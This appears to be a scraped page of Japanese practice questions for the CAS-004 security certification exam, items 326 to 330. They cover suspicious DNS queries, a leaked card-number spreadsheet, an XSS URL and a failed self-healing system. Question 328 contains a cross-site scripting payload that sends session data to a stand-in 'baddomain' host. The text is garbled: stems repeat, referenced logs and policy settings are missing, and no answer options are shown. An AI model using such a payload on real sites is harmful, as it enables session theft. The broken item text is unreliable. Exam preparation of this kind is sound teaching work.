CAS-004-JPN 試験問題 326
セキュリティ アナリストがネットワーク ログを確認すると、次のような、不明なドメインに対する内部サーバーから発信された大量のドメイン名クエリに気付きます。
2736287327321782.hgQ43jsi23-y.com
0357320932922C91.hgQ43jsu23Ty.com
4042301801399103.hgQ43jsu23Ly.com
アナリストは次に何をすべきでしょうか?
2736287327321782.hgQ43jsi23-y.com
0357320932922C91.hgQ43jsu23Ty.com
4042301801399103.hgQ43jsu23Ly.com
アナリストは次に何をすべきでしょうか?
CAS-004-JPN 試験問題 327
経理部門の従業員が、社内のスプレッドシートを外部のメール アドレスに送信したため、潜在的なセキュリティ インシデントが発生しました。スプレッドシートには、数千の支払いカード番号が含まれていました。セキュリティ管理者は、次のフィルター ログとフィルター ポリシー設定を照会しました。
電子メールの送信フィルター ログ情報:
送信フィルター ポリシー設定:
通常の業務運営に支障をきたすことなく、このシナリオの再発を防ぐには、次のどれが最適ですか?
電子メールの送信フィルター ログ情報:
送信フィルター ポリシー設定:
通常の業務運営に支障をきたすことなく、このシナリオの再発を防ぐには、次のどれが最適ですか?
CAS-004-JPN 試験問題 328
脅威アナリストは、HTTP ログを調べているときに次の URL に気づきました。
http://www.safebrowsing~~~/search.asp?q=<script>x=newimage;x.src="http://baddomain~~~/session;
脅威アナリストが認識している攻撃タイプは次のどれですか?
http://www.safebrowsing~~~/search.asp?q=<script>x=newimage;x.src="http://baddomain~~~/session;
脅威アナリストが認識している攻撃タイプは次のどれですか?
CAS-004-JPN 試験問題 329
企業の SOC は、特定の脆弱性を利用したアクティブなキャンペーンに関する脅威インテリジェンスを受け取りました。同社は、このアクティブなキャンペーンに対して脆弱かどうかを判断したいと考えています。
会社がこの決定を下すために使用する必要があるのは、次のうちどれですか?
会社がこの決定を下すために使用する必要があるのは、次のうちどれですか?
CAS-004-JPN 試験問題 330
SaaS ソリューションを提供する組織は最近、顧客データの損失を伴うインシデントを経験しました。システムには、パフォーマンスと使用可能なリソースの監視を含む、一定レベルの自己修復機能があります。システムが問題を検出すると、自己修復プロセスによってソフトウェアの一部が再起動されるはずです。
インシデント発生中、自己修復システムがサービスの再起動を試みましたが、すべてのサービスを再起動するためにデータ ドライブ上で使用可能なディスク領域が不十分でした。自己修復システムは、一部のサービスが完全に再起動されていないことを検出せず、システムが完全に動作していると宣言しました。
サイレント障害が発生した理由を最もよく表しているのはどれですか?
インシデント発生中、自己修復システムがサービスの再起動を試みましたが、すべてのサービスを再起動するためにデータ ドライブ上で使用可能なディスク領域が不十分でした。自己修復システムは、一部のサービスが完全に再起動されていないことを検出せず、システムが完全に動作していると宣言しました。
サイレント障害が発生した理由を最もよく表しているのはどれですか?